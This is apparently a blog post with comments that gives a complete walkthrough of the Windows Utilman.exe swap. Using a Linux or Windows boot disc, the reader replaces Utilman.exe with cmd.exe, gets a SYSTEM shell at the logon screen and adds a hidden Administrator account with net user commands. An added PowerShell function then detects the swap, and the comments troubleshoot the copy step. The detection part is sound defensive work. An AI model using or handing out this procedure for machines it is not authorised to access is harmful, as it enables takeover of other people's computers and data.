To get access to a Windows PC as an Administrator user, there is a very crude security hole you can use. The only catch: you need physical access to the machine.
The procedure is as follows:
- use a Linux Boot-CD (e.g. BackTrack 4 or the System Rescue CD) or a Windows Installation disc (of the same version as installed!)
  - Linux Boot-CD: (there’s also a nice screencast over at offensive-security.com)
    - if not already, mount the Windows partition
    - go to `Windows/system32/`
    - rename the file `Utilman.exe` to `Utilman.exe.bak` and copy `cmd.exe` to `Utilman.exe`:

          # mv Utilman.exe Utilman.exe.bak
          # cp cmd.exe Utilman.exe

    - reboot the machine into Windows
  - Windows Boot-CD:
    - select your Windows version to “repair”
    - if it asks whether you want to use System Rescue, say “No”
    - after it has given up trying to repair your system, click the small link Advanced Recovery Options
    - select Command Prompt
    - now go to your Windows drive, for me it was `D:`
    - do a `cd \Windows\system32`
    - now rename the file `Utilman.exe` to `Utilman.exe.bak` and copy `cmd.exe` to `Utilman.exe`:

          D:\>ren Utilman.exe Utilman.exe.bak
          D:\>copy cmd.exe Utilman.exe

    - reboot the machine into the regular Windows
- on the Logon screen of Windows, press Win+U – this would normally open the Utility Manager, aka. `Utilman.exe`, but now, the Command Prompt should show up
- you have `SYSTEM` rights, so you can easily add a new Administrator user:

      C:\>net user BadGuy GoodPassword /add
      C:\>net localgroup Administrators BadGuy /add

  This will add the user `BadGuy` with the password `GoodPassword` and make him a member of the Administrators group.
- Login with the newly created user `BadGuy`
- Remember to delete the fake `Utilman.exe` and rename `Utilman.exe.bak` back to `Utilman.exe`
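
For defenders, the file swap described above leaves traces that are easy to check for. The following is an added example, not part of the original post: a PowerShell function (the name `Test-UtilmanSwap` is made up here) that flags a `Utilman.exe` that is really `cmd.exe`, or a leftover `Utilman.exe.bak`. It assumes Windows PowerShell 5.1 or later and read access to the `system32` directory being inspected.

```powershell
# Added example, not from the original post. Test-UtilmanSwap is a hypothetical name.
function Test-UtilmanSwap {
    param(
        # system32 directory to inspect; point it at a mounted offline image if needed.
        [string]$System32 = (Join-Path $env:SystemRoot 'System32')
    )
    $utilman  = Join-Path $System32 'Utilman.exe'
    $cmd      = Join-Path $System32 'cmd.exe'
    $backup   = Join-Path $System32 'Utilman.exe.bak'
    $findings = New-Object System.Collections.Generic.List[string]

    if (-not (Test-Path -LiteralPath $utilman -PathType Leaf)) {
        $findings.Add('Utilman.exe is missing')
    } else {
        # Check 1: Utilman.exe is byte-for-byte the same file as cmd.exe.
        if (Test-Path -LiteralPath $cmd -PathType Leaf) {
            $hUtil = (Get-FileHash -LiteralPath $utilman -Algorithm SHA256).Hash
            $hCmd  = (Get-FileHash -LiteralPath $cmd -Algorithm SHA256).Hash
            if ($hUtil -eq $hCmd) { $findings.Add('Utilman.exe has the same SHA-256 as cmd.exe') }
        }
        # Check 2: the embedded version resource still names cmd.exe, which
        # also catches a cmd.exe copied in from a different Windows build.
        $orig = (Get-Item -LiteralPath $utilman).VersionInfo.OriginalFilename
        if ($orig -match '^cmd\.exe') { $findings.Add("Utilman.exe version resource says '$orig'") }
    }
    # Check 3: the renamed original left behind by the procedure.
    if (Test-Path -LiteralPath $backup) { $findings.Add('Utilman.exe.bak is present') }

    [pscustomobject]@{
        System32   = $System32
        Suspicious = ($findings.Count -gt 0)
        Findings   = $findings.ToArray()
    }
}

Test-UtilmanSwap | Format-List
```

If the result is suspicious, also review the members of the local Administrators group for accounts nobody can account for, since adding one is the step the procedure ends with.
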
Good tip, saved me 2h of work reinstalling XP 🙂
hi, access denied when D:>copy cmd.exe Utilman.exe
Start the Command Prompt with Administrator permissions: Start → Programs → Command Prompt → RIGHT CLICK → “Run As Administrator”